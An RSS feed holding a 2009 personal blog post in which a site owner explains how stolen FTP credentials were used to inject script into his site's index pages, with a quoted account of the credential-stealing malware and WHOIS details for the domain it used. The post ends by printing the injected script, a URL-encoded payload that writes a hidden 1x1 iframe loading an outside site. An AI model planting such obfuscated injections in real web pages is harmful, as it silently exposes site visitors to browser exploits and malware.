<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blog @ Changchun China 中国长春 博客 &#187; ftp</title>
	<atom:link href="http://davidcrompton.co.uk/blog/tag/ftp/feed/" rel="self" type="application/rss+xml" />
	<link>http://davidcrompton.co.uk/blog</link>
	<description>davidcrompton.co.uk</description>
	<lastBuildDate>Sun, 28 Aug 2011 01:58:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>FTP Hacked!</title>
		<link>http://davidcrompton.co.uk/blog/2009/11/06/ftp-hacked/</link>
		<comments>http://davidcrompton.co.uk/blog/2009/11/06/ftp-hacked/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 14:59:22 +0000</pubDate>
		<dc:creator>DC</dc:creator>
				<category><![CDATA[Attractions]]></category>
		<category><![CDATA[Technology 科技]]></category>
		<category><![CDATA[UK Life 英国生活]]></category>
		<category><![CDATA[changchun]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://www.davidcrompton.co.uk/blog/?p=274</guid>
		<description><![CDATA[Somehow my FTP password was hacked and this bit of JavaScript was inserted into all of the index.php files that run this site! I found out through this email from Google &#8211; glad they told me as otherwise I may &#8230; <a href="http://davidcrompton.co.uk/blog/2009/11/06/ftp-hacked/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Somehow my FTP password was hacked and this bit of JavaScript was inserted into all of the index.php files that run this site!</p>
<p>I found out through this email from Google &#8211; glad they told me as otherwise I may not have known!</p>
<p><a href="http://www.davidcrompton.co.uk/blog/wp-content/hackedemail.JPG"><img class="aligncenter size-medium wp-image-337" title="hackedemail" src="http://www.davidcrompton.co.uk/blog/wp-content/hackedemail-300x176.jpg" alt="hackedemail" width="197" height="115" /></a></p>
<p>Apparently this hack is a virus which uses stolen FTP password information then injects this bit of code to pages on the server without you realising it.  Where they got my password from I&#8217;m not sure, though I suspect it might have been my old work machine.   <img src='http://davidcrompton.co.uk/blog/wp-content/plugins/tango-smileys-extended/tango/really-pissed.png' alt='Really Pissed' title='Really Pissed' class='tse-smiley' height='16' width='16' /></p>
<p><span id="more-274"></span></p>
<p>This will cause someone who visits the site to run the script, where an exploit kit will test various exploits against the browser and various other installed applications.  Once there is a succcessfull infection various malware packages will be downloaded onto the machine.</p>
<p>According to <a href="http://www.prevx.com/blog/132/Compromised-FTP-details-being-exploited-by-in-the-wild-malware.html" target="_blank">here</a>:</p>
<blockquote><p>Once installed the malware, scours the machines stored  looking for stored FTP login credentials, then once such logins are found it sends this data to a server located in the Cayman Islands! Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using domain goooodbill.cn This script gives the infected client a url in the format USERNAME: PASSWORD@FTP.ADDRESS.COM, the client then logs in to the given ftp site and modifies all index pages (asp,php,html) and injects the script. Once injected all visitors of the modified domain potentially become part of the infection network/cycle.</p></blockquote>
<p>This is pretty sophisticated stuff and allows criminals to get access to lots and lots of machines and steal passwords/data that can be used in criminal activities i.e. emptying somebones bank account or stealing their identity.</p>
<p>One thing I find odd about this is that it goes through a Chinese domain called<strong> goooodbill.cn,</strong> which apparently was registered by a technology company in north east Xiaman.  Wonder if this really is from China as it looks to me like this domain has just been used  as a front &#8211; the name &#8216;MichellGregory&#8217; looks fake to me!   <img src='http://davidcrompton.co.uk/blog/wp-content/plugins/tango-smileys-extended/tango/soldier.png' alt='Soldier' title='Soldier' class='tse-smiley' height='16' width='16' /></p>
<blockquote>
<p style="text-align: left;">Domain Name: goooodbill.cn<br />
ROID: 20090224s10001s39666572-cn<br />
Domain Status: ok<br />
Registrant Organization: DomainsReg<br />
Registrant Name: MichellGregory<br />
Administrative Email: <a style="position: relative; top: -5px;" title="Search for this email address" href="http://www.domaintools.com/registrant-search/?email=27b929310c745be8df7e024628415c07"><img src="http://source.domaintools.com/email.pgif?md5=27b929310c745be8df7e024628415c07&amp;face=arial&amp;size=9&amp;color=000000&amp;bgcolor=FFFFFF&amp;face=arial&amp;size=9&amp;color=0000FF&amp;bgcolor=FFFFFF&amp;format[]=underline&amp;format[]=transparent&amp;format[]=transparent" border="0" alt="" align="middle" /></a><br />
Sponsoring Registrar: 厦门东南融通在线科技有限公司<br />
Name Server:ns1.sikkaro.com<br />
Name Server:ns2.sikkaro.com<br />
Registration Date: 2009-02-24 08:41<br />
Expiration Date: 2010-02-24 08:41</p>
</blockquote>
<p>Here&#8217;s the full script if anyone&#8217;s interested</p>
<blockquote><p>&lt;script&gt;var fr=unescape(&#8216;%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e&#8217; document.write(fr);&lt;/script&gt;</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://davidcrompton.co.uk/blog/2009/11/06/ftp-hacked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

